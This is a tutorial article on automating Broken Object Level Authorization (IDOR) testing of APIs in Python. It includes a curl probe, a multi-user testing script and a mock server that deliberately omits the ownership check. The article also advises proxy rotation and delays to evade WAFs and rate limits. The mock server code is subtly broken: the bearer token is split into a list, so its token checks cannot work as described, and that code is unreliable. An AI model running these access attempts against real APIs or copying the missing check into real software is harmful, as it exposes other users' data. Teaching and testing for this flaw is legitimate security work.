Automating Broken Object Level Authorization (BOLA) Testing in APIs with Python
Broken Object Level Authorization (BOLA), also known as Insecure Direct Object References (IDOR), remains the number one API security risk according to the OWASP API Security Top 10 2023. This critical vulnerability allows authenticated users to bypass authorization and access resources they are not permitted to, typically by manipulating object identifiers in API requests. Automating the detection of BOLA is essential for any serious API security testing regimen, shifting from reactive incident response to proactive vulnerability management. This article details a practical approach to building a Python-based automation script to identify these flaws.
Understanding BOLA: The Core Problem
BOLA vulnerabilities stem from an API's failure to adequately verify if a requesting user is authorized to access a specific data object, even when the user is authenticated. Consider an API endpoint like `/api/v1/users/{user_id}/profile` or `/api/v1/documents/{document_id}`. If the backend merely retrieves the resource based on the provided `user_id` or `document_id` without checking if the currently authenticated user has explicit permission to access *that particular* ID, a BOLA vulnerability exists. Attackers can then enumerate or guess various object IDs to access or modify sensitive data belonging to other users. The issue is compounded when APIs use predictable, sequential identifiers (e.g., `101`, `102`, `103`) rather than universally unique identifiers (UUIDs), making enumeration trivial. A successful BOLA exploit can lead to unauthorized data exposure, modification, or even deletion.
Manual Reconnaissance and Proof-of-Concept
Before automating, understanding the manual exploitation flow provides a clear target for our scripts. A pentester would typically follow these steps:
- Identify an API endpoint that references an object ID in the URL path, query parameters, or request body. For example, `GET /api/v1/documents/doc-456`.
- Authenticate as `User A` and make a legitimate request to retrieve an object they own. Note the object's ID, e.g., `doc-123`, and the successful response.
- Authenticate as `User B` (who should *not* have access to `doc-123`) and attempt to access `doc-123` by modifying the request from step 2.
- Analyze the response. If `User B` receives a `200 OK` status code along with `User A`'s sensitive data, or even a `404 Not Found` (which could still be an information leak, indicating the object exists), instead of a `403 Forbidden` or `401 Unauthorized`, a BOLA vulnerability is confirmed.
Here's a simplified `curl` example demonstrating manual probing for an authenticated `User B` trying to access `User A`'s document:
# Authenticate User B and obtain their JWT token (this is a placeholder for actual login)
# Assume USER_B_TOKEN is obtained.
# Attempt to access User A's document (ID 'doc-123') using User B's token
curl -X GET "https://api.example.com/api/v1/documents/doc-123" \
-H "Authorization: Bearer USER_B_TOKEN"
Expected vulnerable output (200 OK with User A's data):
HTTP/1.1 200 OK
Content-Type: application/json
{
"id": "doc-123",
"owner_id": "user-a-id",
"content": "Sensitive document content belonging to User A."
}
Expected secure output (403 Forbidden):
HTTP/1.1 403 Forbidden
Content-Type: application/json
{
"error": "Forbidden",
"message": "You do not have permission to access this resource."
}
Python for Automated BOLA Testing
Python's `requests` library is an industry standard for making HTTP requests and is ideal for API interaction due to its simplicity and power. Automating BOLA testing involves a structured approach:
- Authentication Management: Maintain separate authenticated sessions for different user roles (e.g., `user_a_session`, `user_b_session`) to simulate various access contexts. This typically involves handling bearer tokens or session cookies.
- Object ID Discovery: As an authorized user, query API endpoints to legitimately discover object IDs. This could involve listing resources (e.g., `GET /api/v1/documents`) or scraping IDs from legitimate responses. For sequential IDs, simple range enumeration is effective.
- Unauthorized Access Attempts: With a list of discovered object IDs, iterate through them, attempting to access each one using sessions associated with unauthorized users.
- Response Analysis: Crucially, examine the HTTP status code and response body for each attempt. A `200 OK` or `201 Created` with unexpected data, or even a `404 Not Found` that implies existence, when a `403 Forbidden` or `401 Unauthorized` was expected, signals a potential BOLA.
The BOLA Hunter Script (Python)
The following Python script provides a framework for automating BOLA detection. It simulates an API with a login endpoint and a document access endpoint.
import requests
import json
import logging
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# --- Configuration ---
API_BASE_URL = "http://localhost:8000" # Replace with your API base URL
# Credentials for different users
USERS = {
"user_a": {"username": "alice", "password": "passwordA"},
"user_b": {"username": "bob", "password": "passwordB"},
"user_c": {"username": "charlie", "password": "passwordC"},
}
# Vulnerable API endpoints (modify as per target API)
ENDPOINTS = {
"login": "/api/v1/auth/login",
"get_my_documents": "/api/v1/documents/me", # Endpoint for a user to get their own documents
"get_document_by_id": "/api/v1/documents/{document_id}", # Endpoint to access any document by ID
}
# --- Helper Functions ---
def authenticate(username, password):
"""
Authenticates a user and returns an authenticated requests.Session object.
Assumes a JWT bearer token is returned in the 'token' field of the JSON response.
"""
login_url = f"{API_BASE_URL}{ENDPOINTS['login']}"
payload = {"username": username, "password": password}
try:
response = requests.post(login_url, json=payload, timeout=10)
response.raise_for_status() # Raise an exception for HTTP errors
token = response.json().get("token")
if token:
session = requests.Session()
session.headers.update({"Authorization": f"Bearer {token}"})
logging.info(f"Successfully authenticated {username}.")
return session
else:
logging.error(f"Authentication failed for {username}: No token received.")
return None
except requests.exceptions.RequestException as e:
logging.error(f"Error during authentication for {username}: {e}")
return None
def get_user_documents(session):
"""
Fetches documents owned by the currently authenticated user for the given session.
Returns a list of document IDs.
"""
documents_url = f"{API_BASE_URL}{ENDPOINTS['get_my_documents']}"
try:
response = session.get(documents_url, timeout=10)
response.raise_for_status()
documents = response.json().get("documents", [])
document_ids = [doc.get("id") for doc in documents if doc.get("id")]
logging.info(f"Discovered {len(document_ids)} documents for user via session.")
return document_ids
except requests.exceptions.RequestException as e:
logging.error(f"Error fetching documents: {e}")
return []
def test_bola_access(attacker_session, victim_document_id, expected_status_code=403):
"""
Attempts to access a victim's document using an attacker's session.
Reports if a BOLA vulnerability is detected.
"""
document_access_url = f"{API_BASE_URL}{ENDPOINTS['get_document_by_id'].format(document_id=victim_document_id)}"
attacker_username = "unknown"
if attacker_session and 'Authorization' in attacker_session.headers:
# Simple way to infer username from authentication process, if available
# More robust methods would involve storing user info with the session
for user, details in USERS.items():
if f"Bearer {details.get('token')}" == attacker_session.headers.get('Authorization'): # This comparison won't work directly if token is dynamic
# This is a simplified approach, in a real scenario, the session object
# itself might store the username, or you pass it explicitly.
attacker_username = user
break
logging.info(f"Attacker ({attacker_username}) attempting to access victim document ID: {victim_document_id}")
try:
response = attacker_session.get(document_access_url, timeout=10)
if response.status_code == expected_status_code:
logging.info(f"[{victim_document_id}] - Access DENIED (Status {response.status_code}). Correct behavior.")
return False # Not vulnerable for this test case
elif response.status_code == 200:
logging.warning(f"!!!! BOLA VULNERABILITY DETECTED !!!!")
logging.warning(f"Attacker ({attacker_username}) accessed {victim_document_id} (Status {response.status_code})")
logging.warning(f"Response: {json.dumps(response.json(), indent=2)}")
return True # Vulnerable
else:
logging.warning(f"[{victim_document_id}] - Unexpected Status {response.status_code} for attacker ({attacker_username}). Response: {response.text}")
return False # Undetermined or other issue
except requests.exceptions.RequestException as e:
logging.error(f"Error accessing document {victim_document_id} with attacker ({attacker_username}): {e}")
return False
# --- Main Automation Logic ---
def run_bola_tests():
"""
Orchestrates the BOLA testing process.
"""
authenticated_sessions = {}
# 1. Authenticate all users
logging.info("--- Phase 1: Authenticating Users ---")
for user_alias, creds in USERS.items():
session = authenticate(creds["username"], creds["password"])
if session:
authenticated_sessions[user_alias] = session
# Store the token with user details for easier lookup in test_bola_access
USERS[user_alias]["token"] = session.headers.get("Authorization").replace("Bearer ", "")
else:
logging.error(f"Failed to get session for {user_alias}. Skipping tests for this user.")
if not authenticated_sessions:
logging.critical("No users authenticated. Cannot proceed with BOLA testing.")
return
# 2. Discover documents owned by a "victim" user (e.g., user_a)
logging.info("\n--- Phase 2: Discovering Victim Documents ---")
victim_user_alias = "user_a"
victim_session = authenticated_sessions.get(victim_user_alias)
if not victim_session:
logging.error(f"Victim user '{victim_user_alias}' session not found. Cannot discover documents.")
return
victim_document_ids = get_user_documents(victim_session)
if not victim_document_ids:
logging.warning(f"No documents discovered for victim user '{victim_user_alias}'. Skipping BOLA tests.")
return
logging.info(f"Documents owned by '{victim_user_alias}': {victim_document_ids}")
# 3. Attempt unauthorized access from other users
logging.info("\n--- Phase 3: Performing Unauthorized Access Attempts ---")
vulnerable_endpoints_found = []
for attacker_alias, attacker_session in authenticated_sessions.items():
if attacker_alias == victim_user_alias:
continue # Skip self-testing for BOLA
logging.info(f"\nTesting from perspective of attacker: {attacker_alias}")
for doc_id in victim_document_ids:
if test_bola_access(attacker_session, doc_id):
vulnerable_endpoints_found.append(f"Document ID: {doc_id} accessed by {attacker_alias}")
if vulnerable_endpoints_found:
logging.critical("\n--- BOLA TEST RESULTS: VULNERABILITIES FOUND! ---")
for vuln in vulnerable_endpoints_found:
logging.critical(f"- {vuln}")
else:
logging.info("\n--- BOLA TEST RESULTS: No BOLA vulnerabilities detected. ---")
# --- Simulate an API Server (for local testing) ---
# This is a barebones simulation and would be replaced by a real API endpoint
# For a real API, remove this section and ensure API_BASE_URL points to your target.
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading
import time
import re
MOCKED_DB = {
"users": {
"alice": {"id": "user-a-id", "password": "passwordA", "documents": ["doc-123", "doc-456"]},
"bob": {"id": "user-b-id", "password": "passwordB", "documents": ["doc-789"]},
"charlie": {"id": "user-c-id", "password": "passwordC", "documents": ["doc-101"]},
},
"documents": {
"doc-123": {"id": "doc-123", "owner_id": "user-a-id", "content": "Alice's Secret Project Plan"},
"doc-456": {"id": "doc-456", "owner_id": "user-a-id", "content": "Alice's Vacation Photos"},
"doc-789": {"id": "doc-789", "owner_id": "user-b-id", "content": "Bob's Personal Notes"},
"doc-101": {"id": "doc-101", "owner_id": "user-c-id", "content": "Charlie's Expense Report"},
}
}
# Simplified JWT creation for demonstration
def create_jwt(user_id):
# In a real app, this would be a proper JWT. For demo, a simple base64-like string.
return f"mock_jwt_for_{user_id}"
class MockAPIServer(BaseHTTPRequestHandler):
def _set_headers(self, status_code=200, content_type='application/json'):
self.send_response(status_code)
self.send_header('Content-type', content_type)
self.end_headers()
def do_POST(self):
if self.path == ENDPOINTS['login']:
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
credentials = json.loads(post_data.decode('utf-8'))
username = credentials.get("username")
password = credentials.get("password")
user_data = MOCKED_DB["users"].get(username)
if user_data and user_data["password"] == password:
token = create_jwt(user_data["id"])
self._set_headers(200)
self.wfile.write(json.dumps({"token": token}).encode('utf-8'))
else:
self._set_headers(401)
self.wfile.write(json.dumps({"error": "Invalid credentials"}).encode('utf-8'))
return
self._set_headers(404)
self.wfile.write(json.dumps({"error": "Not Found"}).encode('utf-8'))
def do_GET(self):
auth_header = self.headers.get("Authorization")
if not auth_header or not auth_header.startswith("Bearer "):
self._set_headers(401)
self.wfile.write(json.dumps({"error": "Unauthorized", "message": "Bearer token missing or invalid"}).encode('utf-8'))
return
token = auth_header.split(" ")
# In a real app, validate JWT. Here, extract user_id from mock token.
if "mock_jwt_for_" not in token:
self._set_headers(401)
self.wfile.write(json.dumps({"error": "Unauthorized", "message": "Invalid mock token"}).encode('utf-8'))
return
authenticated_user_id = token.replace("mock_jwt_for_", "")
current_username = None
for u, data in MOCKED_DB["users"].items():
if data["id"] == authenticated_user_id:
current_username = u
break
if not current_username:
self._set_headers(401)
self.wfile.write(json.dumps({"error": "Unauthorized", "message": "User not found for token"}).encode('utf-8'))
return
# Handle get_my_documents endpoint
if self.path == ENDPOINTS['get_my_documents']:
user_documents = MOCKED_DB["users"].get(current_username, {}).get("documents", [])
response_docs = [MOCKED_DB["documents"][doc_id] for doc_id in user_documents if doc_id in MOCKED_DB["documents"]]
self._set_headers(200)
self.wfile.write(json.dumps({"documents": response_docs}).encode('utf-8'))
return
# Handle get_document_by_id endpoint
match = re.match(r'/api/v1/documents/([^/]+)', self.path)
if match:
requested_doc_id = match.group(1)
document = MOCKED_DB["documents"].get(requested_doc_id)
if document:
# --- BOLA Vulnerability Simulation ---
# This is where the BOLA check should be, but is intentionally omitted for demonstration
# A secure implementation would check:
# if document["owner_id"] != authenticated_user_id:
# self._set_headers(403)
# self.wfile.write(json.dumps({"error": "Forbidden", "message": "You do not own this document."}).encode('utf-8'))
# return
# Simulating the BOLA flaw: it just returns the document if it exists,
# without checking ownership.
self._set_headers(200)
self.wfile.write(json.dumps(document).encode('utf-8'))
return
else:
self._set_headers(404)
self.wfile.write(json.dumps({"error": "Not Found", "message": "Document not found."}).encode('utf-8'))
return
self._set_headers(404)
self.wfile.write(json.dumps({"error": "Not Found"}).encode('utf-8'))
# Main execution block
if __name__ == "__main__":
# Start mock API server in a separate thread
server_address = ('', 8000)
httpd = HTTPServer(server_address, MockAPIServer)
server_thread = threading.Thread(target=httpd.serve_forever)
server_thread.daemon = True # Allow main thread to exit even if server is running
logging.info(f"Starting mock API server on {API_BASE_URL}...")
server_thread.start()
time.sleep(1) # Give server a moment to start
# Run the BOLA tests
run_bola_tests()
# Stop the mock API server
logging.info("Shutting down mock API server.")
httpd.shutdown()
httpd.server_close()
This script first authenticates multiple users, then, as a "victim" user (e.g., Alice), it discovers their owned documents. Subsequently, it attempts to access these discovered documents using the sessions of other "attacker" users (e.g., Bob, Charlie). A `200 OK` response indicates a successful unauthorized access, flagging a BOLA vulnerability. The mock API server is intentionally flawed to demonstrate the vulnerability. In a real-world scenario, the `API_BASE_URL` would point to your target API.
Real-World Considerations
Moving beyond a basic script requires addressing several practical challenges:
- Dynamic Object IDs: While the example uses simple string IDs, real APIs often employ UUIDs (Universally Unique Identifiers) or other complex, unpredictable identifiers. In such cases, direct enumeration is not feasible. The automation script would need to *discover* valid victim object IDs from legitimate user interactions (e.g., parsing responses from `GET /api/v1/my_orders` to get valid order IDs) rather than guessing them.
- Rate Limiting and WAFs: Aggressive enumeration or multiple unauthorized access attempts can trigger rate limits or Web Application Firewalls (WAFs), leading to IP blocking or CAPTCHAs. Implement delays, use proxy rotation, or distribute requests to evade detection. Tools like Burp Suite's Intruder or OWASP ZAP's Fuzzer can aid in managing these aspects, but a custom Python script offers granular control.
- Authentication Mechanisms: The script assumes a Bearer token authentication. APIs might use OAuth 2.0 flows, API keys, basic authentication, or session cookies. The `authenticate` function needs to be adapted to the specific API's authentication method. Python's `requests` library supports various authentication types directly.
- Response Ambiguity: Sometimes, a `404 Not Found` response for an unauthorized object can still indicate a BOLA if the same endpoint returns `404` for non-existent objects, but a different status or error message for *valid but unauthorized* objects. Careful analysis of error messages and status codes is required.
- Reporting and Integration: For large-scale testing, logging to console is insufficient. Integrate with reporting frameworks (e.g., `pytest-html` for test reports, or custom JSON/CSV output) and potentially with CI/CD pipelines to run BOLA checks automatically upon code changes.
- Scope of Object Identifiers: BOLA can manifest in path parameters (`/users/{id}`), query parameters (`/users?id=`), or within the JSON/XML request body. The script needs to be flexible enough to inject attacker-controlled IDs into all relevant locations.
Automating BOLA testing with Python empowers security teams and developers to systematically hunt for these pervasive vulnerabilities. By crafting targeted scripts, it's possible to scale detection efforts and integrate them directly into the development lifecycle, significantly improving API security posture.